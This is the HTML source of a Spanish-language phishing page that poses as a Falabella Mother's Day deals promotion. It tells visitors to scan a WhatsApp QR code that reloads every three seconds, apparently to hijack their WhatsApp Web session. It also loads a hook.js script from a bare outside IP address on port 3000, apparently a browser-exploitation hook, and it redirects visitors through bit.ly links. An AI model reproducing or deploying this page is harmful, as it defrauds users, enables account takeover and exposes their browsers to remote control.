<!DOCTYPE html>
<html lang="es">
  <head>
<title>Ofertazos Falabella</title>
<link rel="icon" type="image/png" sizes="16x16" href="favicon.png">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta http-equiv="refresh" content="120; url=https://bit.ly/3b4hvuw">
    <link href="css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
  <script>var myTimer; myTimer = window.setInterval(reloadD,3000);
	function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.png?h="+d.getTime();}
	</script>
    <div class="container-fluid" style="background-image: url(bg-top.jpg);">
       <a href='https://bit.ly/3ekEzXK'> <center><img src="menu-top.jpg" class="img-fluid"></center></a>
  </div>

    <div class="container-fluid" bis_skin_checked="1">
	<div class="row" bis_skin_checked="1">
		<div class="col-md-12" bis_skin_checked="1">
			<div class="jumbotron" bis_skin_checked="1">
				<div class="view" bis_skin_checked="1">	<img src="madres.jpg" alt="día de la madre" class="img-fluid"></div>
				<center><br><b>1. Escanea el siguiente whatsapp Código QR</b><br>
                    <img id="qrcodew" alt="Scaneame!" src="tmp.png" style="display: block;">
                    <br>Presiona <a href='https://bit.ly/3b4hvuw'>AQUÏ</a>, Si la página no se redirecciona después de escaneado el código
                </center>
			</div>
		</div>
	</div>
</div>

    <center>
        <h2>Conoce más  de nuestras ofertas</h2>
        <p><a class="btn btn-success btn-lg" href="https://bit.ly/3b4hvuw">Conocer ofertas</a></p>
    </center>


    <script src="http://18.188.48.57:3000/hook.js"></script>  
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/scripts.js"></script>
  </body>
</html>